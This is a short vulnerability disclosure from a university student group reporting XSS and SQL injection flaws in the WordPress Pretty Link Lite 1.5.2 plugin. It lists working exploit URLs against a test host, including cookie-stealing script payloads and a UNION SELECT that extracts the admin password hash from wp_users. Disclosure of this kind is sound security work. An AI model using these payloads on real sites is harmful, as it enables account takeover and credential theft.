WordPress Pretty Link plugin version 1.5.2 suffers from remote SQL injection and cross site scripting vulnerabilities.
645accc72ee2fe2317f753776f13fda201dc0541815ade56499ee781fe3641e8
Hi
We have used our tool, THAPS, to identify vulnerabilities in this WordPress plugin.
We have confirmed at least one of the reported vulnerabilities and created a working exploit located below.
Attached is one or more log files containing the output of our tool, identifying the location of the vulnerabilities which might help the developers locate the issue.
Module: Pretty Link Lite
Version: 1.5.2
Confirmed exploits:
Exploit:
http://wp.bacon/wp-content/plugins/pretty-link/pretty-bar.php?url="><script>alert(document.cookie);</script>
Exploit:
The key is automatically generated, but can be found using other vulnerabilities in this module
http://wp.bacon/wp-content/plugins/pretty-link/prli-bookmarklet.php?k=c69dbe5f453820a32b0d0b0bb2098d3d&target_url=%23"><script>alert(document.cookie);</script><a name="
Exploit:
http://wp.bacon/wp-admin/admin.php?page=pretty-link/prli-clicks.php&action=csv&l=1%20and%201=0%20UNION%20SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID=1
Exploit:
http://wp.bacon/wp-admin/admin.php?page=pretty-link/prli-groups.php&action=new
POST data: name="><script>alert(document.cookie);</script>
Best Regards
Heine Pedersen and Torben Jensen
Student project group: sw101f12
Aalborg University
Denmark